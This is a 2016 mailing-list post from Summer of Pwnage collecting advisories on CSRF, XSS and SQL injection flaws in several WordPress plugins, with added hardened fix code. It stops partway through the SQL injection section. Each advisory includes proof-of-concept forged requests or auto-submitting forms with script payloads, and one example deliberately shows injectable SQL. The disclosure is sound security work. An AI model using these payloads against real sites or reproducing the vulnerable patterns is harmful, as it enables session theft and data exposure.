Date: Tue, 2 Aug 2016 20:49:58 +0200
From: Summer of Pwnage <lists@...urify.nl>
To: oss-security@...ts.openwall.com
Subject: Multiple vulnerabilities affecting seven WordPress (XSS, CSRF, SQLi)

Please see attached advisories for more information. These issues were 
found during Summer of Pwnage (https://sumofpwn.nl), a Dutch community 
project. Its goal is to contribute to the security of popular, widely 
used OSS projects in a fun and educational way.


------------------------------------------------------------------------
Cross-Site Request Forgery in ALO EasyMail Newsletter WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0021

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that the ALO EasyMail Newsletter WordPress Plugin is
vulnerable to Cross-Site Request Forgery. Amongst others, this issue can
be used to add/import arbitrary subscribers. In order to exploit this
issue, the attacker has to lure/force a victim into opening a malicious
website/link.

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on ALO EasyMail Newsletter [2]
WordPress Plugin version 2.9.2.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in ALO EasyMail Newsletter version 2.9.3 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
ALO EasyMail Newsletter [2] is a plugin for WordPress that allows you to
write and send newsletters, and to gather and manage subscribers. It
supports internationalization and multiple languages. It was discovered
that the ALO EasyMail Newsletter WordPress Plugin is vulnerable to
Cross-Site Request Forgery.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
A number of actions within ALO EasyMail Newsletter consist of two steps.
The 'step one' action is protected against Cross-Site Request Forgery by
means of the check_admin_referer() WordPress function.

<?php 
/**
 * Bulk action: Step #1/2
 */
if ( isset($_REQUEST['doaction_step1']) ) {
	check_admin_referer('alo-easymail_subscribers');


However, for all 'step two' actions the call to check_admin_referer()
has been commented out, so the second request is processed without any
nonce check. An attacker can therefore forge any 'step two' request on
behalf of a logged on administrator.

/**
 * Bulk action: Step #2/2
 */
if ( isset($_REQUEST['doaction_step2']) ) {
	//if($wp_version >= '2.6.5')
	//	check_admin_referer('alo-easymail_subscribers');
	
Amongst others, this issue can be used to add/import arbitrary
subscribers. In order to exploit this issue, the attacker has to
lure/force a victim into opening a malicious website/link.
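
The shape the fix needs, as an added example that is not the plugin's
own code: both steps of a bulk action verify the nonce, and the form
that step one renders carries that nonce into step two. It runs inside
WordPress (check_admin_referer, wp_nonce_field, current_user_can are the
WordPress API); the handler bodies, the form fields and the capability
name are assumed for illustration.

```php
<?php
// Added example, not code from the ALO EasyMail plugin. The nonce action
// 'alo-easymail_subscribers' is the one named in the advisory; everything
// else here (fields, capability, handler bodies) is assumed.

if ( isset( $_REQUEST['doaction_step1'] ) ) {
	// Calls wp_die() unless _wpnonce is valid for this action and the
	// Referer points back into wp-admin.
	check_admin_referer( 'alo-easymail_subscribers' );
	if ( ! current_user_can( 'manage_options' ) ) {
		wp_die( 'Insufficient privileges' );
	}

	// Step one renders the confirmation form for step two. The hidden
	// nonce field is what allows step two to verify that the request
	// originated from this page rather than from an attacker's site.
	?>
	<form method="post" enctype="multipart/form-data">
		<?php wp_nonce_field( 'alo-easymail_subscribers' ); ?>
		<input type="hidden" name="action" value="import_step2" />
		<input type="file" name="uploaded_csv" />
		<input type="submit" name="doaction_step2" value="Upload CSV file" />
	</form>
	<?php
}

if ( isset( $_REQUEST['doaction_step2'] ) ) {
	// The vulnerable version had this call commented out, so a cross-site
	// form post carrying doaction_step2 was processed as-is.
	check_admin_referer( 'alo-easymail_subscribers' );
	if ( ! current_user_can( 'manage_options' ) ) {
		wp_die( 'Insufficient privileges' );
	}

	// Only reached with a valid nonce and a privileged user: process the
	// uploaded CSV here (assumed body).
	if ( ! empty( $_FILES['uploaded_csv']['tmp_name'] ) && is_uploaded_file( $_FILES['uploaded_csv']['tmp_name'] ) ) {
		$rows = array_map( 'str_getcsv', file( $_FILES['uploaded_csv']['tmp_name'], FILE_IGNORE_NEW_LINES ) );
		// ... validate each row (email, name, language) and insert subscribers ...
	}
}
```

The point to check in any multi-step handler: every request that changes
state needs the nonce check, not only the first one. A step that is only
reachable "after" another step is still reachable directly, as the proof
of concept below shows by posting doaction_step2 straight away.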

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
POST /wp-admin/edit.php?post_type=newsletter&page=alo-easymail%2Fpages%2Falo-easymail-admin-subscribers.php&doaction_step2=true&action=import HTTP/1.1
Host: <target>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: <session cookies>
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------17016644981835490787491067954
Content-Length: 645

-----------------------------17016644981835490787491067954
Content-Disposition: form-data; name="uploaded_csv"; filename="foo.csv"
Content-Type: text/plain

sumofpwn@...urify.n;Summer of Pwnage;en

-----------------------------17016644981835490787491067954
Content-Disposition: form-data; name="post_type"

newsletter
-----------------------------17016644981835490787491067954
Content-Disposition: form-data; name="action"

import_step2
-----------------------------17016644981835490787491067954
Content-Disposition: form-data; name="doaction_step2"

Upload CSV file
-----------------------------17016644981835490787491067954--

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_alo_easymail_newsletter_wordpress_plugin.html
[2] https://wordpress.org/plugins/alo-easymail/
[3] https://downloads.wordpress.org/plugin/alo-easymail.2.9.3.zip
------------------------------------------------------------------------
Cross-Site Scripting in Contact Bank WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Contact Bank
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0023

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Contact Bank - Contact Forms
Builder [2] WordPress Plugin version 2.1.21.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Contact Bank version 2.1.23 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Contact Bank [2] WordPress Plugin is a form builder plugin that lets
you create contact forms in seconds with ease. A Cross-Site Scripting
vulnerability was found in the Contact Bank WordPress Plugin. This issue
allows an attacker to perform a wide variety of actions, such as
stealing Administrators' session tokens, or performing arbitrary actions
on their behalf. In order to exploit this issue, the attacker has to
lure/force a logged on WordPress Administrator into opening a malicious
website.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The issue exists in the file views/header.php and is caused by the lack
of output encoding on the page request parameter. The vulnerable code is
listed below.

<script>
jQuery(document).ready(function()
{
	jQuery(".nav-tab-wrapper > a#<?php echo $_REQUEST["page"];?>").addClass("nav-tab-active");
});
</script>

Normally, the page URL parameter is validated by WordPress before a
plugin's admin page is loaded, which prevents Cross-Site Scripting via
the query string. Here, however, the value is read from $_REQUEST
instead of $_GET. $_REQUEST is assembled from $_GET and $_POST (and,
depending on PHP's request_order and variables_order settings, $_COOKIE)
with later sources overwriting earlier ones, so a POST parameter named
page replaces the validated query-string value. This allows parameter
pollution: the attacker puts a benign page value in the URL, so that
WordPress routes the request to the plugin, and simultaneously submits a
malicious page value as a POST parameter, which is the value that ends
up inside the script block.
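
How the two sources merge, and how to close the hole, as an added
example that is not the plugin's code. The merge function mimics what
PHP does when it builds $_REQUEST; the template function reads the
validated source only and emits the value as a JSON string literal for
the JavaScript context it lands in. The two fallbacks at the top only
exist so the file also runs outside WordPress; sanitize_key and
wp_json_encode themselves are WordPress functions.

```php
<?php
// Added example, not code from the Contact Bank plugin. Runs inside
// WordPress; outside it, the two fallbacks below stand in for the
// WordPress helpers so the file can be executed on its own.
if ( ! function_exists( 'sanitize_key' ) ) {
	function sanitize_key( $key ) { return preg_replace( '/[^a-z0-9_\-]/', '', strtolower( (string) $key ) ); }
}
if ( ! function_exists( 'wp_json_encode' ) ) {
	function wp_json_encode( $data ) { return json_encode( $data ); }
}

/**
 * How PHP builds $_REQUEST with the usual request_order "GP": $_GET first,
 * then $_POST, later sources overwriting earlier ones (with request_order
 * unset, variables_order "EGPCS" applies and $_COOKIE is merged as well).
 * A POST field named 'page' therefore replaces the 'page' that WordPress
 * validated from the query string.
 */
function merged_request( array $get, array $post ): array {
	return array_merge( $get, $post );
}

/**
 * Hardened template line. Reads the validated source only ($_GET), reduces
 * it to a menu slug, and emits it as a JSON string literal so it can end
 * neither the JavaScript string nor the <script> element (json_encode
 * writes "/" as "\/", so "</script>" cannot appear in the output).
 */
function nav_tab_script( array $get ): string {
	$slug = isset( $get['page'] ) ? sanitize_key( $get['page'] ) : '';
	return '<script>jQuery(function(){jQuery(".nav-tab-wrapper > a#" + '
		. wp_json_encode( $slug ) . ').addClass("nav-tab-active");});</script>';
}

// Constructed request mirroring the proof of concept: a benign page in the
// URL and the attacker's page in the POST body.
$get  = array( 'page' => 'contact_dashboard' );
$post = array( 'page' => '</script><script>alert(1);</script>' );

$request = merged_request( $get, $post );
echo $request['page'], "\n";        // the attacker's value is what $_REQUEST["page"] returns
echo nav_tab_script( $get ), "\n";  // selector built from "contact_dashboard" only
echo nav_tab_script( $post ), "\n"; // even the hostile value is reduced to "scriptscriptalert1script"
```

The two measures are independent: reading from $_GET removes the
pollution vector, and encoding for the JavaScript context removes the
injection even if a hostile value does arrive. Both should be applied;
an input filter alone is a guess about the output context.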

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form action="http://<target>/wp-admin/admin.php?page=contact_dashboard" method="POST">
			<input type="hidden" name="page" value="</script><script>alert(1);</script>" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_contact_bank_wordpress_plugin.html
[2] https://wordpress.org/plugins/contact-bank/
[3] https://downloads.wordpress.org/plugin/contact-bank.zip
------------------------------------------------------------------------
Cross-Site Scripting in Uji Countdown WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Uji Countdown
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0029

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Uji Countdown [2] WordPress Plugin
version 2.0.6.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Uji Countdown version 2.0.7 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Uji Countdown [2] WordPress Plugin allows users to display a
countdown on their post or page. A Cross-Site Scripting vulnerability
was found in the Uji Countdown WordPress Plugin. This issue allows an
attacker to perform a wide variety of actions, such as stealing
Administrators' session tokens, or performing arbitrary actions on their
behalf.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The issue exists in the file /classes/class-uji-countdown-admin.php and
is caused by the lack of output encoding in the ujic_tabs_values()
function.

private function ujic_tabs_values() {
	global $wpdb;
	$ujictab = '';
	$table_name = $wpdb->prefix . "uji_counter";
	$ujic_datas = $wpdb->get_results( "SELECT * FROM $table_name ORDER BY `time` DESC" );
	if ( !empty( $ujic_datas ) ) {
		foreach ( $ujic_datas as $ujic ) {
			$ujic_style = !empty( $ujic->style ) ? $ujic->style : 'classic';
			$ujic_ico = '<span id="ujic-style-' . $ujic_style . '" class="ujic-types">' . $ujic_style . '</span>';
			$ujictab .='<tr>
							<td>' . $ujic->time . '</td>
							<td>' . $ujic->title . '</td>
							<td>' . $ujic_ico . '</td>
							<td>
						<a href="?page=uji-countdown&tab=tab_ujic_new&edit=' . $ujic->id . '"><i class="dashicons dashicons-welcome-write-blog"></i>Edit</a> | <a href="options-general.php?page=uji-countdown&del=' . $ujic->id . '"><i class="dashicons dashicons-trash"></i> Delete</a>
					</td>
					</tr>';
		}
	}

	return $ujictab;
}

The save handler that the proof of concept drives is not protected by a
nonce, so the crafted title can be stored by Cross-Site Request Forgery;
the payload then fires whenever an administrator opens the plugin's
settings page, where ujic_tabs_values() renders the stored title without
escaping. In order to exploit this issue, the attacker has to lure/force
a logged on WordPress Administrator into opening a malicious website.
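
The row builder with every dynamic value escaped for the context it
lands in, and the state-changing delete link carrying a nonce that its
handler verifies, as an added example that is not the plugin's code. It
runs inside WordPress; the column names follow the advisory's snippet,
while the nonce action names and the delete handler are assumed.

```php
<?php
// Added example, not code from the Uji Countdown plugin. Column names are
// those in the advisory's snippet; the nonce actions and the handler
// shape are assumed.

function ujic_tab_row( $ujic ): string {
	$style = ! empty( $ujic->style ) ? $ujic->style : 'classic';

	// Attribute context -> esc_attr(); element text context -> esc_html().
	$ico = '<span id="ujic-style-' . esc_attr( $style ) . '" class="ujic-types">'
	     . esc_html( $style ) . '</span>';

	$edit_url = add_query_arg(
		array( 'page' => 'uji-countdown', 'tab' => 'tab_ujic_new', 'edit' => (int) $ujic->id ),
		admin_url( 'options-general.php' )
	);
	// Delete changes state, so the link carries a nonce bound to this row id.
	$del_url = wp_nonce_url(
		add_query_arg( array( 'page' => 'uji-countdown', 'del' => (int) $ujic->id ), admin_url( 'options-general.php' ) ),
		'uji_countdown_delete_' . (int) $ujic->id
	);

	return '<tr>'
		. '<td>' . esc_html( $ujic->time ) . '</td>'
		. '<td>' . esc_html( $ujic->title ) . '</td>'   // the field the proof of concept poisons
		. '<td>' . $ico . '</td>'
		. '<td><a href="' . esc_url( $edit_url ) . '">Edit</a> | '
		. '<a href="' . esc_url( $del_url ) . '">Delete</a></td>'
		. '</tr>';
}

// Handler side: the nonce from the link is checked before the row is
// removed, and the save that the proof of concept drives cross-site
// must do the same with a nonce field in its form.
function ujic_handle_delete(): void {
	if ( ! isset( $_GET['del'] ) ) {
		return;
	}
	$id = (int) $_GET['del'];
	check_admin_referer( 'uji_countdown_delete_' . $id );
	if ( ! current_user_can( 'manage_options' ) ) {
		wp_die( 'Insufficient privileges' );
	}
	global $wpdb;
	$wpdb->delete( $wpdb->prefix . 'uji_counter', array( 'id' => $id ), array( '%d' ) );
}
```

Escaping belongs at the point of output, chosen by context: esc_html()
for text between tags, esc_attr() inside attribute values, esc_url() for
href values. Filtering on input does not replace it, because the same
stored value may later be rendered in a different context.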

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form action="http://<target>/wp-admin/options-general.php?page=uji-countdown&tab=tab_ujic_new&style=classic&save=true" method="POST">
			<input type="hidden" name="ujic&#95;style" value="classic" />
			<input type="hidden" name="ujic&#95;name" value="&quot;><script>alert(1);</script>" />
			<input type="hidden" name="ujic&#95;goof" value="ABeeZee" />
			<input type="hidden" name="ujic&#95;pos" value="center" />
			<input type="hidden" name="ujic&#95;d" value="true" />
			<input type="hidden" name="ujic&#95;h" value="true" />
			<input type="hidden" name="ujic&#95;m" value="true" />
			<input type="hidden" name="ujic&#95;s" value="true" />
			<input type="hidden" name="ujic&#95;txt" value="true" />
			<input type="hidden" name="ujic&#95;size" value="32" />
			<input type="hidden" name="ujic&#95;col&#95;dw" value="&#35;a61ba6" />
			<input type="hidden" name="ujic&#95;col&#95;up" value="&#35;c368c3" />
			<input type="hidden" name="ujic&#95;col&#95;txt" value="&#35;ffffff" />
			<input type="hidden" name="ujic&#95;col&#95;sw" value="&#35;000000" />
			<input type="hidden" name="ujic&#95;col&#95;lab" value="&#35;000000" />
			<input type="hidden" name="ujic&#95;lab&#95;sz" value="13" />
			<input type="hidden" name="ujic&#95;subscrFrmWidth" value="100" />
			<input type="hidden" name="ujic&#95;subscrFrmAboveText" value="Join&#32;Our&#32;Newsletter" />
			<input type="hidden" name="ujic&#95;subscrFrmInputText" value="Enter&#32;your&#32;email&#32;here" />
			<input type="hidden" name="ujic&#95;subscrFrmSubmitText" value="Subscribe" />
			<input type="hidden" name="ujic&#95;subscrFrmSubmitColor" value="&#35;ab02b2" />
			<input type="hidden" name="ujic&#95;subscrFrmThanksMessage" value="Thanks&#32;for&#32;subscribing" />
			<input type="hidden" name="ujic&#95;subscrFrmErrorMessage" value="Invalid&#32;email&#32;address" />
			<input type="hidden" name="submit&#95;ujic" value="Save&#32;Style" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_uji_countdown_wordpress_plugin.html
[2] https://wordpress.org/plugins/uji-countdown/
[3] https://downloads.wordpress.org/plugin/uji-countdown.zip
------------------------------------------------------------------------
Cross-Site Scripting in WangGuard WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the WangGuard
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0030

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on WangGuard [2] WordPress Plugin
version 1.7.1.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in WangGuard version 1.7.2 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The WangGuard [2] WordPress Plugin protects against sploggers and spam
user registrations. A Cross-Site Scripting vulnerability was found in
the WangGuard WordPress Plugin. This issue allows an attacker to perform
a wide variety of actions, such as stealing Administrators' session
tokens, or performing arbitrary actions on their behalf.


------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The issue exists in the file wangguard-admin.php and is caused by the
lack of output encoding on the security questions & answers. It should
be noted that this functionality is also vulnerable to Cross-Site
Request Forgery.

jQuery("#wangguardnewquestionbutton").click(function() {
	jQuery("#wangguardnewquestionerror").hide();
	var wgq = jQuery("#wangguardnewquestion").val();
	var wga = jQuery("#wangguardnewquestionanswer").val();
	if ((wgq=='') || (wga=='')) {
		jQuery("#wangguardnewquestionerror").slideDown();
		return;
	}
	data = {
		action	: 'wangguard_ajax_questionadd',
		q		: wgq,
		a		: wga
	};
	jQuery.post(ajaxurl, data, function(response) {
		if (response!='0') {
			jQuery("#wangguard-question-noquestion").remove();
			var newquest = '<div class="wangguard-question" id="wangguard-question-'+response+'">';
			newquest += '<?php  echo addslashes(__("Question", 'wangguard')) ?>: <strong>'+wgq+'</strong><br/>';
			newquest += '<?php  echo addslashes(__("Answer", 'wangguard')) ?>: <strong>'+wga+'</strong><br/>';
			newquest += '<a href="javascript:void(0)" rel="'+response+'" class="wangguard-delete-question"><?php  echo addslashes(__('delete question', 'wangguard')) ?></a></div>';
			jQuery("#wangguard-new-question-container").append(newquest);
			jQuery("#wangguardnewquestion").val("");
			jQuery("#wangguardnewquestionanswer").val("");
		}
		else if (response=='0') {
			jQuery("#wangguardnewquestionerror").slideDown();
		}
	});
});

In order to exploit this issue, the attacker has to lure/force a logged
on WordPress Administrator into opening a malicious website.
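
The AJAX endpoint and the page script hardened, as an added example that
is not the plugin's code: the handler verifies a nonce (the CSRF fix)
and sanitizes the fields, and the success callback builds the new
element through the DOM API instead of concatenating HTML (the XSS fix).
It runs inside WordPress; the script handle 'wangguard-admin', the table
name and the nonce action 'wangguard_question' are assumptions.

```php
<?php
// Added example, not code from the WangGuard plugin. Runs inside
// WordPress; the script handle, table name and nonce action are assumed.

add_action( 'wp_ajax_wangguard_ajax_questionadd', 'example_questionadd' );

function example_questionadd(): void {
	// Dies with -1 unless the 'security' field carries a valid nonce for
	// 'wangguard_question'. A cross-site form cannot supply that value.
	check_ajax_referer( 'wangguard_question', 'security' );
	if ( ! current_user_can( 'manage_options' ) ) {
		wp_send_json_error( 'forbidden', 403 );
	}
	$q = sanitize_text_field( wp_unslash( $_POST['q'] ?? '' ) );
	$a = sanitize_text_field( wp_unslash( $_POST['a'] ?? '' ) );
	if ( '' === $q || '' === $a ) {
		wp_send_json_error( 'empty' );
	}
	wp_send_json_success( array( 'id' => example_store_question( $q, $a ) ) );
}

function example_store_question( string $q, string $a ): int {
	global $wpdb;
	$wpdb->insert( $wpdb->prefix . 'wangguard_questions', // assumed table
		array( 'question' => $q, 'answer' => $a ), array( '%s', '%s' ) );
	return (int) $wpdb->insert_id;
}

// Hands the nonce to the page script; 'wangguard-admin' must be an enqueued handle.
function example_admin_scripts(): void {
	wp_localize_script( 'wangguard-admin', 'wgAjax', array(
		'url'   => admin_url( 'admin-ajax.php' ),
		'nonce' => wp_create_nonce( 'wangguard_question' ),
	) );
}
add_action( 'admin_enqueue_scripts', 'example_admin_scripts' );

function example_admin_inline_script(): void { ?>
<script>
jQuery("#wangguardnewquestionbutton").click(function () {
	var wgq = jQuery("#wangguardnewquestion").val();
	var wga = jQuery("#wangguardnewquestionanswer").val();
	if (wgq === "" || wga === "") { jQuery("#wangguardnewquestionerror").slideDown(); return; }
	jQuery.post(wgAjax.url, { action: "wangguard_ajax_questionadd", security: wgAjax.nonce, q: wgq, a: wga }, function (resp) {
		if (!resp.success) { jQuery("#wangguardnewquestionerror").slideDown(); return; }
		// Build the node through the DOM API: .text() creates text nodes, so a
		// value like "><script>... is shown literally instead of being parsed.
		var box = jQuery("<div>", { "class": "wangguard-question", id: "wangguard-question-" + resp.data.id });
		box.append(jQuery("<strong>").text(wgq)).append("<br/>");
		box.append(jQuery("<strong>").text(wga)).append("<br/>");
		box.append(jQuery("<a>", { href: "#", rel: String(resp.data.id), "class": "wangguard-delete-question" }).text("delete question"));
		jQuery("#wangguard-new-question-container").append(box);
		jQuery("#wangguardnewquestion").val("");
		jQuery("#wangguardnewquestionanswer").val("");
	}, "json");
});
</script>
<?php }
add_action( 'admin_footer', 'example_admin_inline_script' );
```

The wp_ajax_ hook only runs for logged-in users, which is exactly why the
nonce matters: a logged-in administrator's browser will happily send the
session cookie along with a request that an attacker's page created.
Stored questions must still be escaped wherever the admin page later
renders them from the database.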

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form action="http://<target>/wp-admin/admin-ajax.php" method="POST">
			<input type="hidden" name="action" value="wangguard&#95;ajax&#95;questionadd" />
			<input type="hidden" name="q" value="xss&#63;" />
			<input type="hidden" name="a" value="&quot;><script>alert(1);</script>" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_wangguard_wordpress_plugin.html
[2] https://wordpress.org/plugins/wangguard/
[3] https://downloads.wordpress.org/plugin/wangguard.1.7.2.zip
------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Booking Calendar WordPress Plugin
------------------------------------------------------------------------
Edwin Molenaar [2], July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Booking Calendar
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing users' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a victim into opening a malicious
website/link.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160714-0003

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Booking Calendar [3] WordPress
Plugin version 6.2.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Booking Calendar version 6.2.1 [4].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Booking Calendar [3] WordPress Plugin is a booking system that
provides online reservation and availability checking for a site. A
Reflected Cross-Site Scripting vulnerability exists in the Booking
Calendar WordPress plugin. It allows an attacker to perform any action
with the privileges of the target user. The affected code is not
protected with an anti-Cross-Site Request Forgery token, so it can be
exploited by luring the target user into clicking a specially crafted
link or visiting a malicious website (or advertisement).

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The vulnerability exists in the wpdev_bk_settings_form_labels() function
in booking/lib/wpdev-settings-general.php (line 1492).

All input fields on the Booking > Settings > Fields page are vulnerable
to Cross-Site Scripting, e.g.
http://<target>/wp-admin/admin.php?page=booking%2Fwpdev-booking.phpwpdev-booking-option&tab=form.

All forms on the Booking > Settings > Import tab are vulnerable as well,
but that tab requires a valid anti-CSRF token, so those forms cannot be
driven from a third-party site, e.g.
http://<target>/wp-admin/admin.php?page=booking%2Fwpdev-booking.phpwpdev-booking-option&tab=sync.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form action="http://<target>/wp-admin/admin.php?page=booking%2Fwpdev-booking.phpwpdev-booking-option&tab=form" method="POST">
			<input type="hidden" name="booking&#95;form&#95;field&#95;label1" value="&quot;&gt;&lt;script&gt;alert&#40;document&#46;domain&#41;&lt;&#47;script&gt;" />
			<input type="hidden" name="booking&#95;form&#95;field&#95;label2" value="&quot;&gt;&lt;script&gt;alert&#40;document&#46;domain&#41;&lt;&#47;script&gt;" />
			<input type="hidden" name="booking&#95;form&#95;field&#95;label3" value="&quot;&gt;&lt;script&gt;alert&#40;document&#46;domain&#41;&lt;&#47;script&gt;" />
			<input type="hidden" name="booking&#95;form&#95;field&#95;label6" value="&quot;&gt;&lt;script&gt;alert&#40;document&#46;domain&#41;&lt;&#47;script&gt;" />
			<input type="hidden" name="booking&#95;form&#95;field&#95;values6" value="" />
			<input type="hidden" name="booking&#95;form&#95;field&#95;label4" value="&quot;&gt;&lt;script&gt;alert&#40;document&#46;domain&#41;&lt;&#47;script&gt;" />
			<input type="hidden" name="booking&#95;form&#95;field&#95;active4" value="On" />
			<input type="hidden" name="booking&#95;form&#95;field&#95;label5" value="&quot;&gt;&lt;script&gt;alert&#40;document&#46;domain&#41;&lt;&#47;script&gt;" />
			<input type="hidden" name="Submit" value="Save&#32;Changes" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_booking_calendar_wordpress_plugin.html
[2] https://www.linkedin.com/in/edwinmolenaar
[3] https://wordpress.org/plugins/booking/
[4] https://downloads.wordpress.org/plugin/booking.zip
------------------------------------------------------------------------
SQL injection vulnerability in Booking Calendar WordPress Plugin
------------------------------------------------------------------------
Edwin Molenaar [2], July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
An SQL injection vulnerability exists in the Booking Calendar WordPress
plugin. It allows an attacker to read data from the database. The
affected parameter is neither properly sanitized nor protected with an
anti-Cross-Site Request Forgery token, so it can also be exploited by
luring a privileged user into clicking a specially crafted link or
visiting a malicious website (or advertisement).

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160714-0002

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Booking Calendar [3] WordPress
Plugin version 6.2.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Booking Calendar version 6.2.1 [4].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Booking Calendar [3] WordPress Plugin is a booking system that
provides online reservation and availability checking for a site. An
SQL injection vulnerability exists in the Booking Calendar WordPress
plugin. It allows an attacker to read data from the database. The
affected parameter is neither properly sanitized nor protected with an
anti-Cross-Site Request Forgery token, so it can also be exploited by
luring a privileged user into clicking a specially crafted link or
visiting a malicious website (or advertisement).

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This was discovered through the 'filter by Booking ID' field. Because
the Booking plugin is also usable by WordPress users with the 'Editor'
role, Editors can reach the vulnerable parameter, so an Editor (or
anyone who can make an Editor or Administrator submit the request) can
read any data in the database. The vulnerability exists in the
wpdev_get_args_from_request_in_bk_listing() function in
booking/lib/wpdev-bk-lib.php (line 709).
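
The listing filter built twice, as an added example that is not the
plugin's code: once in the injectable shape, where the request value is
concatenated into the WHERE clause, and once through $wpdb->prepare(),
which is the WordPress API for parameterised queries. It runs inside
WordPress; the table and column names and the capability are assumed.

```php
<?php
// Added example, not code from the Booking Calendar plugin. Runs inside
// WordPress ($wpdb); table, column and capability names are assumed.

/**
 * Vulnerable shape: the filter value is concatenated into the WHERE clause,
 * so "3 AND (SELECT ...)" from the proof of concept becomes part of the SQL
 * and the whole subquery runs with the site's database credentials.
 */
function bk_listing_where_unsafe( array $request ): string {
	$where = ' WHERE 1=1';
	if ( ! empty( $request['wh_booking_id'] ) ) {
		$where .= ' AND bk.booking_id = ' . $request['wh_booking_id'];
	}
	return $where;
}

/**
 * Fixed shape: every user-controlled value goes through $wpdb->prepare().
 * %d casts to integer, so the payload above collapses to the number 3 and
 * the trailing subquery is discarded; use %s for string columns, which
 * quotes and escapes the value instead.
 */
function bk_listing_where_safe( array $request ): string {
	global $wpdb;
	$where = ' WHERE 1=1';
	if ( ! empty( $request['wh_booking_id'] ) ) {
		$where .= $wpdb->prepare( ' AND bk.booking_id = %d', $request['wh_booking_id'] );
	}
	if ( ! empty( $request['wh_is_new'] ) ) {
		$where .= $wpdb->prepare( ' AND bk.is_new = %d', $request['wh_is_new'] );
	}
	return $where;
}

/**
 * The listing query with the safe filter. It also gates on a capability:
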